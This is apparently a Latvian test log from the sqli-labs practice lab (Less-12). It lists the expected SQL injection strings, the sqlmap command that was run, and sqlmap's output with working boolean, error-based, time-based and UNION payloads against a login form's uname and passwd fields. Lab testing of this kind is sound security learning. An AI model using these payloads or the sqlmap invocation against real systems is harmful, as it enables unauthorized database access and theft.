=================================================================================
1. Īpašība: "Hello, World!" - vajadzētu strādāt visvienkāršākajām injekcijām
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: uname=test' or 1=1-- -&passwd=test
3.2. error-based: uname=test'&passwd=test
3.3. time-based: uname=test' or sleep(1)-- -&passwd=test
3.4. union: uname=test' union select 1,2-- -&passwd=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 4539205 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-12/" -p uname,passwd --data="uname=test&passwd=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.3. POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
7.4. there were multiple injection points, please select the one to use for following injections: 0 (0 nozīmē = parameter: username)
=================================================================================
sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
---
Parameter: passwd (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=test&passwd=-3589' OR 3383=3383-- Vcfa

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test&passwd=test' AND GTID_SUBSET(CONCAT(0x7170627071,(SELECT (ELT(4100=4100,1))),0x71707a6b71),4100)-- MFMU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test&passwd=test' AND (SELECT 8815 FROM (SELECT(SLEEP(5)))ydrK)-- ikEa

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test&passwd=test' UNION ALL SELECT CONCAT(0x7170627071,0x6873514f6579766253675353506a787a735259745366754e717644766b4b46536a7442525256746a,0x71707a6b71),NULL-- -

Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=-2841' OR 3610=3610-- pvwy&passwd=test

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test' AND GTID_SUBSET(CONCAT(0x7170627071,(SELECT (ELT(3572=3572,1))),0x71707a6b71),3572)-- LrZc&passwd=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 6900 FROM (SELECT(SLEEP(5)))CgkL)-- RLGv&passwd=test

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test' UNION ALL SELECT NULL,CONCAT(0x7170627071,0x74455452516c6e59696b574573625544516162717675774a534e65707653476376616e74667a514c,0x71707a6b71)-- -&passwd=test
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6

